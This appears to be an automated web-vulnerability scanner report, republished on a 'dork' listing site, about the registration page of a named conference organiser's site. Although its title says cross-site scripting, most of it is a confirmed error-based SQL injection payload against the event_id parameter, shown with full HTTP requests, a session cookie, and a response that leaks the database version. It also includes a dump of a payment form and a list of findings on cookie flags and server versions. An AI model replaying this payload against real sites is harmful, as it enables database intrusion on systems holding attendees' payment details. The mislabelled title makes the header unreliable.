XSS, Cross Site Scripting in events.gmsiweb.com, CWE-79, CAPEC-86, DORK, GHDB

- /subscribe.php

/subscribe.php CONFIRMED

https://events.gsmiweb.com/subscribe.php?event_id=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconc..

Parameters

Parameter	Type	Value
event_id	GET	(select 1 and row(1,1)>(select count(),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()2))x from (select 1 union select 2)a group by x limit 1))

Extracted Data

5.0.45-log

Request

GET /subscribe.php?event_id=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1)) HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: events.gsmiweb.com
Cookie: PHPSESSID=f6q3nruen2uq30q516cepkjdf7
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Thu, 28 Apr 2011 13:52:30 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 130
Connection: close
Content-Type: text/html

<script language="javascript"> window.location.href="events.php"; </script>Duplicate entry '_!@4dilemma:0' for key 1

- /subscribe.php

/subscribe.php CONFIRMED

https://events.gsmiweb.com/subscribe.php?event_id=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconc..

Parameters

Parameter	Type	Value
event_id	GET	(select 1 and row(1,1)>(select count(),concat(CONCAT(CHAR(95),CHAR(33),CHAR(64),CHAR(52),CHAR(100),CHAR(105),CHAR(108),CHAR(101),CHAR(109),CHAR(109),CHAR(97)),0x3a,floor(rand()2))x from (select 1 union select 2)a group by x limit 1))
accomodations	POST	3
address	POST	3
avail_balance	POST	3
balance_after_ct	POST	3
card_num	POST	3
cc_type	POST	Mastercard
city	POST	3
company	POST	3
conference	POST	3
conferenceval	POST	895.00,356
contact_fname	POST	Smith
contact_lname	POST	Smith
coupon	POST	3
coupon_amount	POST	3
department	POST	3
dietary	POST	3
discountamount	POST	0
discountcode	POST	3
email	POST	netsparker@example.com
event	POST	Cyber Security Summit
eventid	POST	82
exp_month	POST	1
exp_year	POST	11
fax	POST	3
first_name	POST	Smith
last_name	POST	Smith
leed_source	POST	3
pakdis	POST	3
payment_method	POST	cc
phone	POST	3
priceconfid	POST	0
priceworkshopid	POST	3
reset	POST	reset
response_code	POST	3
sessions0	POST	0
sessions1	POST	1
sessions2	POST	2
sessions3	POST	3
sncount	POST	4
state	POST	3
Status	POST	3
submit	POST	Submit
title	POST	3
total	POST	3
workshop	POST	3
workshop_alphabet	POST	3
workshop1	POST	295.00,358,A
workshop2	POST	295.00,360,C
workshopsession1	POST	1
workshopsession2	POST	2
zip	POST	3

Request

GET /subscribe.php?event_id=(select+1+and+row(1%2c1)%3e(select+count(*)%2cconcat(CONCAT(CHAR(95)%2CCHAR(33)%2CCHAR(64)%2CCHAR(52)%2CCHAR(100)%2CCHAR(105)%2CCHAR(108)%2CCHAR(101)%2CCHAR(109)%2CCHAR(109)%2CCHAR(97))%2c0x3a%2cfloor(rand()*2))x+from+(select+1+union+select+2)a+group+by+x+limit+1)) HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: events.gsmiweb.com
Cookie: PHPSESSID=f6q3nruen2uq30q516cepkjdf7
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 200 OK
Date: Thu, 28 Apr 2011 13:52:30 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Content-Length: 130
Connection: close
Content-Type: text/html

<script language="javascript"> window.location.href="events.php"; </script>Duplicate entry '_!@4dilemma:0' for key 1

- /subscribe.php

/subscribe.php

https://events.gsmiweb.com/subscribe.php?event_id=82

Found E-mails

info@gsmiweb.com

Request

POST /subscribe.php?event_id=82 HTTP/1.1
Referer: https://events.gsmiweb.com/subscribe.php?event_id=82
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: events.gsmiweb.com
Cookie: PHPSESSID=f6q3nruen2uq30q516cepkjdf7
Content-Length: 673
Accept-Encoding: gzip, deflate

accomodations=&address=&avail_balance=&balance_after_ct=&card_num=&cc_type=Mastercard&city=&company=&conference=&conferenceval=895.00%2c356&contact_fname=&contact_lname=&coupon=&coupon_amount=&department=&dietary=&discountamount=0&discountcode=&email=&event=Cyber+Security+Summit&eventid=82&exp_month=1&exp_year=11&fax=&first_name=&last_name=&leed_source=&pakdis=&payment_method=cc&phone=&priceconfid=0&priceworkshopid=&reset=reset&response_code=&sessions0=0&sessions1=1&sessions2=2&sessions3=3&sncount=4&state=&Status=&submit=Submit&title=&total=&workshop=&workshop_alphabet=&workshop1=295.00%2c358%2cA&workshop2=295.00%2c360%2cC&workshopsession1=1&workshopsession2=2&zip=

Response

HTTP/1.1 200 OK
Date: Thu, 28 Apr 2011 13:52:03 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.2.14
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Transfer-Encoding: chunked
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html><head><link rel="stylesheet" href="css/default.advanced.css" type="text/css" media="screen" /><link rel="stylesheet" href="css/addoncss.css" type="text/css" media="screen" /><link rel="stylesheet" href="css/dropdown.css" type="text/css" media="screen" /><link rel="stylesheet" href="css/form.css" type="text/css" media="screen" /><link rel="stylesheet" href="css/gsmi_events.css" type="text/css" media="screen" /><title>Global Strategic Management Institute (GSMI) - Performance Management, Balanced Scorecard Training, Performance Management Conferences, Performance Management Training</title><META name="description" content="The Global Strategic Management Institute (GSMI) is the nation's premier provider of Performance Management education through business conferences, business event and business training.. We enable executive decision makers to better measure, manage and implement strategies to improve individual and organizational performance using tools like the Balanced Scorecard. GSMI research centers include: Leadership, Finance, Human Resources (HR) Business Analytics, Budgeting and Forecasting and Performance Management"><META name="keywords" content="gsmi, performance management, balanced scorecard, business conferences ,business events, business training, finance, leadership, process improvement, hr management, human resources, corporate performance management, business performance management, business analytics, corporate strategy, business strategy, organizational effectiveness, performance appraisals, human capital planning, operational performance"><meta http-equiv="Content-Type" content="text/html; charset=utf-8"><script src="includes/common.js"></script><script src="includes/ajaxgold.js"></script><script src="includes/number_format.js"></script><script language="JavaScript" src="https://secure.comodo.net/trustlogo/javascript/trustlogo.js" type="text/javascript"></script><script language="javascript">function calculate(){ var eventid=82; sncount = document.getElementById('sncount').value; var wcheckstatus='no'; var amt = 0; amount = 0; priamount = 0; woramount = 0; confamt = 0; priceid = 0; var workshop_alphabet = ''; priceworkshopid = ''; workshop_alphabet = ''; object = ''; disamount = ''; //for getting conference value if(isNaN(document.subscription_form.conferenceval.length)) { var brokenconf = (document.subscription_form.conferenceval.value).split(","); confamt = parseInt(brokenconf[0]); priamount = parseInt(priamount) + parseInt(confamt); priceid = brokenconf[1]; } else if(getRadioValue(document.subscription_form.conferenceval)) { var brokenconf = getRadioValue(document.subscription_form.conferenceval).split(","); confamt = parseInt(brokenconf[0]); priamount = parseInt(priamount) + parseInt(confamt); priceid = brokenconf[1]; } //for enabling and disabling the checkbox and option button var myarr = document.getElementsByName("workshop0"); var myarrofradio1 = document.getElementsByName("workshop1"); var myarrofradio2 = document.getElementsByName("workshop2"); var myarrofradio3 = document.getElementsByName("workshop3"); if (document.getElementById('wcheck')) { for(j=0;j<myarr.length;j++) { if(myarr[j].checked==true) { wcheckstatus='workshop0'; } } } if (document.getElementById('wradio')) { for(j=0;j<myarrofradio1.length;j++) { if(myarrofradio1[j].checked==true) { wcheckstatus='workshop'; } } for(j=0;j<myarrofradio2.length;j++) { if(myarrofradio2[j].checked==true) { wcheckstatus='workshop'; } } for(j=0;j<myarrofradio3.length;j++) { if(myarrofradio3[j].checked==true) { wcheckstatus='workshop'; } } } for(k=0; k<document.subscription_form.elements.length; k++) { if(wcheckstatus=='workshop0') { if(document.subscription_form.elements[k].id=="wradio") { document.subscription_form.elements[k].disabled=true; document.subscription_form.elements[k].checked=false; } } else if(wcheckstatus=='workshop') { if(document.subscription_form.elements[k].id=="wcheck") { document.subscription_form.elements[k].disabled=true; } } else { } } //for getting workshop value for(var i=0; i<sncount; i++) { object = eval("document.subscription_form.sessions" + i); //for checkbox in workshop if(i == 0) { if (document.getElementById('wcheck')) { for(var j=0; j<myarr.length; j++) { if(myarr[j].checked==true) { var chkbroken=myarr[j].value; var chkbrokenval = chkbroken.split(","); var chkamt = parseInt(chkbrokenval[0]); woramount = parseInt(woramount) + parseInt(chkamt); var chkid = chkbrokenval[1]; var chkalphabet = chkbrokenval[2]; workshop_alphabet = workshop_alphabet.concat(chkalphabet,';'); var sesname='workshopsession'+i; var sam=document.getElementById(sesname).value; priceworkshopid = priceworkshopid.concat(sam,';'); } } } } //for radio buttons in workshop else { var wshopname = "workshop"+i; var obje = document.getElementsByName(wshopname); if (obje) { var brokenstring = getRadioValue(obje).split(','); amt = parseInt(brokenstring[0]); if (!isNaN(amt)) { woramount = parseInt(woramount) + parseInt(amt); var sesname='workshopsession'+i; var sam=document.getElementById(sesname).value; priceworkshopid = priceworkshopid.concat(sam,';'); } var wid = parseInt(brokenstring[1]); var walphabet = brokenstring[2]; if (walphabet) { workshop_alphabet = workshop_alphabet.concat(walphabet,';'); } } } } priamount = number_format(priamount,2,'.',''); woramount = number_format(woramount,2,'.',''); amount = parseInt(priamount) + parseInt(woramount); $('amount').value = $('total').value = number_format(amount,2,'.',''); document.getElementById('priceworkshopid').value=priceworkshopid; document.getElementById('workshop_alphabet').value=workshop_alphabet; document.getElementById('workshop').value=woramount; document.getElementById('conference').value=parseInt(priamount); document.getElementById('priceconfid').value=priceid; postDataReturnText('apply-packagediscount.php','eventid='+eventid+'&total=' + $('total').value+'&priceid='+priceworkshopid,applypackageDiscount); }//for applying discounts automatically when the workshops are selectedfunction applypackageDiscount(text){ block($('package_msg')); arr = text.split('|'); if (!isNaN(arr[1])) { if(arr[2]!='') { $('package_msg').innerHTML = '<img src="images/accept.png" align="absmiddle" />'+arr[0]; document.getElementById('pakdis').value=arr[3]; } else { $('package_msg').innerHTML = ''; document.getElementById('pakdis').value=''; } $('amount').value = arr[1]; $('total').value = arr[1]; } postDataReturnText('apply-discount.php','coupon=' + $('coupon').value +'&total=' + $('total').value,applyDiscount);}//for applying the discount by entering its discount couponfunction applyDiscount(text){ var a_balance = 0; if($('avail_balance').value!='') a_balance = $('avail_balance').value; arr = text.split('|'); if (!isNaN(arr[0])) { if(arr[0]==0) { document.getElementById("cc").style.display='none'; } $('amount').value = arr[0]; $('coupon_msg').innerHTML = '<img src="images/accept.png" align="absmiddle" />'; document.getElementById('discountamount').value=arr[1]; document.getElementById('balance_after_ct').value=arr[2]; document.getElementById('discountcode').value=arr[4]; document.getElementById('coupon_amount').value=arr[3]; } else { $('coupon_msg').innerHTML = '<img src="images/cross.png" align="absmiddle" /> '+ arr[0]; $('coupon').value = ''; $('amount').value = arr[1]; }}function resetradiobutton(){for(k=0; k<document.subscription_form.elements.length; k++) { if(document.subscription_form.elements[k].id=="wradio" || document.subscription_form.elements[k].id=="wcheck" || document.subscription_form.elements[k].id=="conferenceval") { if(document.subscription_form.elements[k].disabled==true) document.subscription_form.elements[k].disabled=false; if(document.subscription_form.elements[k].checked==true) document.subscription_form.elements[k].checked=false; } } $('amount').value = $('total').value = ''; document.getElementById('priceconfid').value=''; document.getElementById('conference').value=''; document.getElementById('priceworkshopid').value=''; document.getElementById('workshop_alphabet').value=''; document.getElementById('workshop').value=''; $('coupon_msg').innerHTML=''; $('coupon').value = ''; $('package_msg').innerHTML=''; document.getElementById('pakdis').value=''; }function createinputbox(selectObject){ var ind = selectObject.options[selectObject.selectedIndex].value; if(ind=="Other") document.getElementById('sourceinput').innerHTML='<input type="text" id="other" name="other">'; else document.getElementById('sourceinput').innerHTML='';} </script><style type="text/css">#brighton_sub-menu{display:block;position:static;z-index:999;line-height:0;}#brighton_sub-menu ul{display:block;list-style-type:none;margin:0;padding:0;float:none;position:static;}#brighton_sub-menu ul li{display:block;margin:0;padding:0;font-size:12px;width:100%;position:static;line-height:16px;}#brighton_sub-menu ul li a{display:block;text-decoration:none;width:100%;}#brighton_sub-menu ul li a:hover{cursor:pointer;background:#f1f1f1;}#brighton_sub-menu ul li a span{display:block;padding:7px 15px 7px 14px;line-height:17px;}#brighton_sub-menu ul li.selectedtab{background:#f1f1f1;}#brighton_sub-menu ul li.selectedtab a{font-weight:bold;}#brighton_sub-menu ul li.first a span{}#brighton_sub-menu ul li.last{margin-bottom:25px;}#brighton_sub-menu ul li.separator{display:none;}#brighton_sub-menu ul li.haschildren{margin-bottom:0;}#brighton_sub-menu ul li.haschildren a span{}#brighton_sub-menu ul li.childitem1{background:#f1f1f1;margin-bottom:0;}#brighton_sub-menu ul li.childitem1 a span{margin-left:15px;}#brighton_sub-menu ul li.childitem1.last{padding-bottom:10px;}#brighton_sub-menu ul li.selectedpath{font-weight:normal;}/* fix to negate radmenu inherited style */#brighton_sub-menu div.radmenu{float:none;position:static;white-space:wrap;}#brighton_sub-menu div.radmenu ul.horizontal,#brighton_sub-menu div.radmenu ul.vertical{position:static;}#brighton_content div.radmenu ul.rootGroup{position:static;}#brighton_content div.radmenu ul.vertical{position:static;}.radmenu ul.horizontal,.radmenu ul.vertical,.radmenu .item{position:static;}#brighton_sub-menu .radmenu .item{position:static;}#brighton_sub-menu .radmenu .item a{position:static;}#brighton_sub-menu .radmenu .item a span{position:static;white-space:normal;}#brighton_sub-menu div.radmenu{float:none;position:static;white-space:wrap;}#brighton_sub-menu div.radmenu ul.horizontal,#brighton_sub-menu div.radmenu ul.vertical{position:static;}#brighton_content div.radmenu ul.rootGroup{position:static;}#brighton_content div.radmenu ul.vertical{position:static;}.radmenu ul.horizontal,.radmenu ul.vertical,.radmenu .item{position:static;}#brighton_sub-menu .radmenu .item{position:static;}#brighton_sub-menu .radmenu .item a{position:static;}#brighton_sub-menu .radmenu .item a span{position:static;white-space:normal;}#wrapper #left_main .right .eventtitle { font-size: 16px; font-weight: bold; color: #009BD4; text-decoration: underline;}#wrapper #left_main .right .fancy li { list-style-image: url(assets/templates/images/2010_bullet.png);}#wrapper #left_main .right .eventtitle a { font-size: 16px; font-weight: bold; color: #009BD4; text-decoration: underline;}</style><script language="javascript" type="text/javascript">//<![CDATA[var tl_loc0=(window.location.protocol == "https:")? "https://secure.comodo.net/trustlogo/javascript/trustlogo.js" :"http://www.trustlogo.com/trustlogo/javascript/trustlogo.js";document.writeln('<scr' + 'ipt language="JavaScript" src="'+tl_loc0+'" type="text\/javascript">' + '<\/scr' + 'ipt>');//]]></script></head><body> <div id="wrapper"><div id="header"><img src="https://events.gsmiweb.com/images/logo.gif" width="249" height="75" align="left" /><img src="https://events.gsmiweb.com/images/phone.gif" width="250" height="75" align="right" /></div><div id="navigation"><ul class="dropdown dropdown-horizontal"><li><a href="http://gsmiweb.com/" title="Home" Business Management Training>Home</a></li><li><a href="http://events.gsmiweb.com/events.php" title="Events" >Events</a></li><li class="active"><a href="http://gsmiweb.com/training.html" title="Training" >Training</a><ul><li><a href="/training/in-house-training.html" title="In-House Training" >In-House Training</a></li><li><a href="http://gsmiweb.com/training/balancedscorecard.html" title="Balanced Scorecard Training" >Balanced Scorecard Training</a></li><li class="last"><a href="http://gsmiweb.com/training/quality-assurance-masters.html" title="Quality Assurance Masters" >Quality Assurance Masters</a></li></ul></li><li><a href="http://gsmiweb.com/webinars.html" title="Online Webinars" >Webinars</a><ul><li><a href="http://grcwebconference.gsmiweb.com/" title="GRC Webinar" >GRC Webinar</a></li></ul></li><li><a href="http://blog.gsmiweb.com" title="Blog" >Blog</a></li><li><a href="http://gsmiweb.com/sponsors.html" title="Sponsors" >Sponsors</a><ul><li><a href="http://gsmiweb.com/sponsors/corporate-sponsors.html" title="Corporate Sponsors" >Corporate Sponsors</a></li><li><a href="http://gsmiweb.com/sponsors/strategic-partners.html" title="Strategic Partners" >Strategic Partners</a></li><li><a href="http://gsmiweb.com/sponsors/media-partners.html" title="Media Partners" >Media Partners</a></li><li><a href="http://gsmiweb.com/sponsors/enterprise-software.html" title="Enterprise Software" >Enterprise Software</a></li><li><a href="http://gsmiweb.com/sponsors/sustainability.html" title="Sustainability" >Sustainability</a></li><li class="last"><a href="http://gsmiweb.com/sponsors/data-centers.html" title="Data Center" >Data Center</a></li></ul></li><li><a href="http://community.gsmiweb.com/" title="GSMI Community" _blank>GSMI Community</a></li><li><a href="http://gsmiweb.com//aboutus.html" title="About Us" >About Us</a><ul><li><a href="/aboutus/leadership-team.html" title="Leadership Team" >Leadership Team</a></li><li class="last"><a href="http://gsmiweb.com/aboutus/gsmi-team.html" title="GSMI Team" >The GSMI Team</a></li></ul></li><li class="last"><a href="http://gsmiweb.com/register.php" title="Register Now" >Register Now</a></li></ul> </div><div id="content"><h1>Register Now</h1><table width="100%" border="0" cellspacing="0" cellpadding="0" align="left"> <tr> <td height="549"> </td> <td valign="top" bgcolor="#FFFFFF"> <img src="/imgs/thumbs/5160413684d9df8af86bac.jpg" border="0" width="175" class="coverthumbs" align="right"/> <p><span class="subheaders"><h3>Cyber Security Summit</h3></span><br> <strong></strong><br><br> <li> Event Location: Washington DC</li> <li> Resort Name: <a href="http://www.kelloggconferencehotel.com/" target="_blank">Kellogg Conference Hotel Gallaudet University</a></li> <li> Event Dates: May 10th - May 12th, 2011</li> <li><a href="http://cybersecuritystrategiessummit.com/ " target="_blank">Event Information</a></li><br/><br/> <form method="post" action="" name="subscription_form" id="subscription_form"> <h1>payment information</h1> <p><em>* indicates mandatory field</em> </p> <table border="0" cellpadding="3" cellspacing="0"> <tr> <td height="28" colspan="6" class="missing"><li>Please, fill in the required fields.</li> i = 15 amount</td> </tr> <tr> <td width="98" height="28" class="content">First Name*</td> <td width="180"><input name="contact_fname" type="text" class="formside2" id="contact_fname" value=""></td> <td class="content">Last Name*</td> <td colspan="3" valign="top"><input name="contact_lname" class="formside2" type="text" id="contact_lname" value=""> </tr> <tr> <td class="content">Title*</td> <td colspan="3" valign="top"> <input name="title" type="text" id="title" class="formside2" value=""> <input type="hidden" name="event" id="event" value="Cyber Security Summit" class="formside2"> <input type..

GHDB, DORK VULNERABILITIES Vulnerabilities
	CRITICAL 31 % IMPORTANT 23 % LOW 31 % INFORMATION 15 %

XSS, Cross Site Scripting in events.gmsiweb.com, CWE-79, CAPEC-86, DORK, GHDB

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

GHDB DORK Tests

GHDB, DORK VULNERABILITIES

GHDB, DORK VULNERABILITY SUMMARY

SQL Injection

Impact

Actions to Take

Remedy

Required Skills for Successful Exploitation

External References

Remedy References

/subscribe.php CONFIRMED

Parameters

Extracted Data

Request

Response

/subscribe.php CONFIRMED

Parameters

Extracted Data

Request

Response

[Probable] SQL Injection

Impact

Actions to Take

Remedy

Required Skills for Successful Exploitation

External References

Remedy References

/subscribe.php

Parameters

Request

Response

/subscribe.php

Parameters

Request

Response

Cross-site Scripting

Impact

Remedy

Remedy References

External References

/subscribe.php CONFIRMED

Parameters

Request

Response

/subscribe.php CONFIRMED

Parameters

Request

Response

Cookie Not Marked As Secure

Impact

Actions to Take

Remedy

Required Skills for Successful Exploitation

/subscribe.php CONFIRMED

Identified Cookie

Request

Response

Cookie Not Marked As HttpOnly

Impact

Actions to Take

Remedy

External References

/subscribe.php CONFIRMED

Identified Cookie

Request

Response

Apache Version Disclosure

Impact

Remedy

/subscribe.php

Extracted Version

Request

Response

PHP Version Disclosure

Impact

/subscribe.php

Extracted Version

Request